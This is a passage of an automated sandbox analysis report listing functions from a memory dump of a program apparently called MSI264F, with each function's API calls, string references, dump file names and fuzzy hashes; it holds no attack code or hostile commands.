                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF29E5
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00AF2A14
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: vector<T> too long
                                                                                                                        • API String ID: 1785806476-3788999226
                                                                                                                        • Opcode ID: fa138cdbea518ca1347cca2d77860bf1124a2ab82fd8013ac2e0aa7909d0a970
                                                                                                                        • Instruction ID: 18e674be4761bc36c63f1f191fdf4597fedb70e46593d7b1d512d8d19a1637c2
                                                                                                                        • Opcode Fuzzy Hash: fa138cdbea518ca1347cca2d77860bf1124a2ab82fd8013ac2e0aa7909d0a970
                                                                                                                        • Instruction Fuzzy Hash: C90192B26002059FC734DFA9DC81C67B7E9EB947507188A2DF55A87654EA30F900CBA0
                                                                                                                        Function 00AE42E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 00AE42F8
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • _free.LIBCMT ref: 00AE4345
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                        • String ID: ..\CTL32\Config.cpp
                                                                                                                        • API String ID: 1020059152-24132961
                                                                                                                        • Opcode ID: 186f3566b1f50ed0459ed2df3619ad3cb03f371fb5b70139583171e8da25e79b
                                                                                                                        • Instruction ID: a87cad48b4e41414b24777d17576e433b90cc98fd4f802a93c3aa4a20fc08453
                                                                                                                        • Opcode Fuzzy Hash: 186f3566b1f50ed0459ed2df3619ad3cb03f371fb5b70139583171e8da25e79b
                                                                                                                        • Instruction Fuzzy Hash: E8018BB660510A6B9B10EE68DC82CAB73DDEF88360B154165F908D7342EA71ED2187B1
                                                                                                                        Function 00B33200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00B33215
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00B33240
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: vector<T> too long
                                                                                                                        • API String ID: 1785806476-3788999226
                                                                                                                        • Opcode ID: 53767d2839fe8c26550ba4855caab9652e8e91455f81ff82d01b34d3d5a77efa
                                                                                                                        • Instruction ID: bbaa4c869c75384ec7e9c91e3f6ca2fce9963db357779f33232a4d81529fecc4
                                                                                                                        • Opcode Fuzzy Hash: 53767d2839fe8c26550ba4855caab9652e8e91455f81ff82d01b34d3d5a77efa
                                                                                                                        • Instruction Fuzzy Hash: 6A01B1B26002059FCB20DEADCC81C6BB7E9EF847107248A6DF89683655DA30F900CBA0
                                                                                                                        Function 00AEE310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoMonitor_memset
                                                                                                                        • String ID: h
                                                                                                                        • API String ID: 741975714-2439710439
                                                                                                                        • Opcode ID: d7dd769d44e20b6d8583e1a63dd65002c04c5ccdee06ede0a9f5fbd184b284cd
                                                                                                                        • Instruction ID: c43ade6284f1a726ba03644fce016c473cdd345178d5796b1c9475f4a372a2bc
                                                                                                                        • Opcode Fuzzy Hash: d7dd769d44e20b6d8583e1a63dd65002c04c5ccdee06ede0a9f5fbd184b284cd
                                                                                                                        • Instruction Fuzzy Hash: EA111874E003089BCB14CF99D845A9EF7F9FF88710F10851DE85AAB390DB70A905CB81
                                                                                                                        Function 00B02BF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wvsprintf
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                        • API String ID: 2795597889-2052047905
                                                                                                                        • Opcode ID: 518d7ec95af5d8fdb64bee83421c9a5835480bee03fa71df82bf8dcbbdaf9c8d
                                                                                                                        • Instruction ID: ad2379118a7b69cd668880bf8c300f71c08068f4d5355b03dee6ee35d2f1128e
                                                                                                                        • Opcode Fuzzy Hash: 518d7ec95af5d8fdb64bee83421c9a5835480bee03fa71df82bf8dcbbdaf9c8d
                                                                                                                        • Instruction Fuzzy Hash: C8F06235A10108A7CB14AFA49C159AE77F8EB85700F008199F906972D0EE749A4887D5
                                                                                                                        Function 00B02C70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wvsprintf
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                        • API String ID: 2795597889-2052047905
                                                                                                                        • Opcode ID: 1798f7b8236e82a723f9c82ba9ee7e2f273c4771bf28fa1c382b6adfa4f5ee2b
                                                                                                                        • Instruction ID: 015a18564e6ddb0ff5ebaf0c368d1a29e2402b13c850a6e1fa86c6e6a9f297d0
                                                                                                                        • Opcode Fuzzy Hash: 1798f7b8236e82a723f9c82ba9ee7e2f273c4771bf28fa1c382b6adfa4f5ee2b
                                                                                                                        • Instruction Fuzzy Hash: 61F08176A10208A7CB10EFA4EC559EEBBF8EF44710F108199F445A7290EE709A48C7D1
                                                                                                                        Function 00AEA000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00AEA029
                                                                                                                        • wsprintfW.USER32 ref: 00AEA048
                                                                                                                          • Part of subcall function 00AE9FD0: _free.LIBCMT ref: 00AE9FDE
                                                                                                                          • Part of subcall function 00AE9FD0: __wcsdup.LIBCMT ref: 00AE9FEA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory__wcsdup_freewsprintf
                                                                                                                        • String ID: \%s.inf
                                                                                                                        • API String ID: 2724493947-3360618689
                                                                                                                        • Opcode ID: c672109c1c50ed7b87d375d10e46c6efb73c9738ffb556254ba13d0ebb97bc2d
                                                                                                                        • Instruction ID: 74f4a05b80cf708b6899ead288b5f3b556ff1d6c70a9e5f335c0934e30913315
                                                                                                                        • Opcode Fuzzy Hash: c672109c1c50ed7b87d375d10e46c6efb73c9738ffb556254ba13d0ebb97bc2d
                                                                                                                        • Instruction Fuzzy Hash: B8F0A9B56017089BC724DF58DC45A6AB3F8BF58700F104699E805D3291DEB4AE04CBD5
                                                                                                                        Function 00B0C440 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,SetSecurityInfo), ref: 00B0C454
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0C489
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: SetSecurityInfo
                                                                                                                        • API String ID: 199729137-240378450
                                                                                                                        • Opcode ID: 21558ba7c73f2335d2cde5ceace7d67ebf83da62b0840045eb5eae6bbc72c12c
                                                                                                                        • Instruction ID: acd1217de70a9469c76e490dfc23d81e9525a37251b49020d6c59e9770296a0a
                                                                                                                        • Opcode Fuzzy Hash: 21558ba7c73f2335d2cde5ceace7d67ebf83da62b0840045eb5eae6bbc72c12c
                                                                                                                        • Instruction Fuzzy Hash: A7F0EC76640218ABC714DF98D894EAB7BECEB5C711F00861AF94997390C674EC50CBA4
                                                                                                                        Function 00B44E9D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B399AC: __getptd.LIBCMT ref: 00B399B2
                                                                                                                          • Part of subcall function 00B399AC: __getptd.LIBCMT ref: 00B399C2
                                                                                                                        • __getptd.LIBCMT ref: 00B44EAC
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __getptd.LIBCMT ref: 00B44EBA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 803148776-1018135373
                                                                                                                        • Opcode ID: bfa18c89df22b6cb03034eef96fb48c0053ccaa17589e13beae9b8f0c6b75ade
                                                                                                                        • Instruction ID: ed80c78fcf5b835248968fd450390f81c845759699b6efa8b121bb59b6072406
                                                                                                                        • Opcode Fuzzy Hash: bfa18c89df22b6cb03034eef96fb48c0053ccaa17589e13beae9b8f0c6b75ade
                                                                                                                        • Instruction Fuzzy Hash: 27014F348002059ACF389FA4C48476DB3F5FF15311F6544AEE049A6551CB319EA5FB51
                                                                                                                        Function 00B0C350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,BuildExplicitAccessWithNameW), ref: 00B0C364
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0C391
                                                                                                                        Strings
                                                                                                                        • BuildExplicitAccessWithNameW, xrefs: 00B0C35E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: BuildExplicitAccessWithNameW
                                                                                                                        • API String ID: 199729137-2598508172
                                                                                                                        • Opcode ID: a2e8634c18795c793123d71d6da5d3ba0df93d3ebdb2d60216de6f207cfdc229
                                                                                                                        • Instruction ID: 2dc8de71ff409edefdfa23092bd944b422bf360e0334a6101caea6c77185cb8b
                                                                                                                        • Opcode Fuzzy Hash: a2e8634c18795c793123d71d6da5d3ba0df93d3ebdb2d60216de6f207cfdc229
                                                                                                                        • Instruction Fuzzy Hash: 77F0FE76650218AFC714DF98D844DABBBECEB48B51F00C51AF95997291C774EC10CBE4
                                                                                                                        Function 00AFC000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,ConvertStringSecurityDescriptorToSecurityDescriptorW), ref: 00AFC014
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00AFC03D
                                                                                                                        Strings
                                                                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorW, xrefs: 00AFC00E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorW
                                                                                                                        • API String ID: 199729137-4218572124
                                                                                                                        • Opcode ID: 68ac9164b49a532c8fdb558d094a5db0a247ee645dccfad24d2c1590f697b2d4
                                                                                                                        • Instruction ID: 8a7d49c6c2978b2c0093794f1b2913f76ad7dc4e15b6db8e0182604b0ce938e8
                                                                                                                        • Opcode Fuzzy Hash: 68ac9164b49a532c8fdb558d094a5db0a247ee645dccfad24d2c1590f697b2d4
                                                                                                                        • Instruction Fuzzy Hash: F3F0FE72641218ABC724DF98E944A67B7ECEB48B61F00451AF94597680CA75E810CBB5
                                                                                                                        Function 00B0C3F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,SetEntriesInAclW), ref: 00B0C404
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B0C42D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: SetEntriesInAclW
                                                                                                                        • API String ID: 199729137-3166073420
                                                                                                                        • Opcode ID: 3a3ae40a60e17da898b159dcb1f6e86e110ec6efa5650210573ec41850c56356
                                                                                                                        • Instruction ID: 3a5074174de1dbd148d470e09ff7c25fa7a8a3bf3656db25028af738167cb60e
                                                                                                                        • Opcode Fuzzy Hash: 3a3ae40a60e17da898b159dcb1f6e86e110ec6efa5650210573ec41850c56356
                                                                                                                        • Instruction Fuzzy Hash: 7EF019756406185BD720DF94E844E6777DCEB48711F00451AFD4A97380CB74EC10CBA4
                                                                                                                        Function 00AE45F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsncpywsprintf
                                                                                                                        • String ID: %s\ConfigList\%s
                                                                                                                        • API String ID: 2047606353-2266011117
                                                                                                                        • Opcode ID: 28717ff71690add10a8b42111be4b9e99da36673f4163c0276002a88dc0efb71
                                                                                                                        • Instruction ID: 182120a23e7197d339543bded0a5de38ddefdc42bd39d084a37ff0895f561b3b
                                                                                                                        • Opcode Fuzzy Hash: 28717ff71690add10a8b42111be4b9e99da36673f4163c0276002a88dc0efb71
                                                                                                                        • Instruction Fuzzy Hash: 3FF0547590120CAFCB00EF94CD49DEA73F8EB48300F0481D9F51957252DE70AA05CB91
                                                                                                                        Function 00B12140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,CheckTokenMembership), ref: 00B12154
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 00B12179
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: CheckTokenMembership
                                                                                                                        • API String ID: 199729137-412103321
                                                                                                                        • Opcode ID: b14c9034222abe3bdca5caa2cc6809c68c3be92de13ed4641236f1aeaa75b353
                                                                                                                        • Instruction ID: c22e16837428775b455b27482a1d5e6c19f6b96c49ed4d28ffa6b0c62517a6ab
                                                                                                                        • Opcode Fuzzy Hash: b14c9034222abe3bdca5caa2cc6809c68c3be92de13ed4641236f1aeaa75b353
                                                                                                                        • Instruction Fuzzy Hash: EAF03072A40315AFC710DF94DC44EABB7ECEB54751F00845AF95997750C674E850CBA0
                                                                                                                        Function 00B121F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B0B080: GetCurrentThreadId.KERNEL32 ref: 00B0B08E
                                                                                                                          • Part of subcall function 00B0B080: EnterCriticalSection.KERNEL32(?,?,?,00B8C2FC,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B098
                                                                                                                          • Part of subcall function 00B0B080: LeaveCriticalSection.KERNEL32(?,?,00000000,?,00B1BA0F,00000000,?,00B06949,00000847), ref: 00B0B0B8
                                                                                                                        • LoadStringW.USER32(00000000,?,00000454,00000200), ref: 00B1221C
                                                                                                                        • wsprintfW.USER32 ref: 00B1222D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
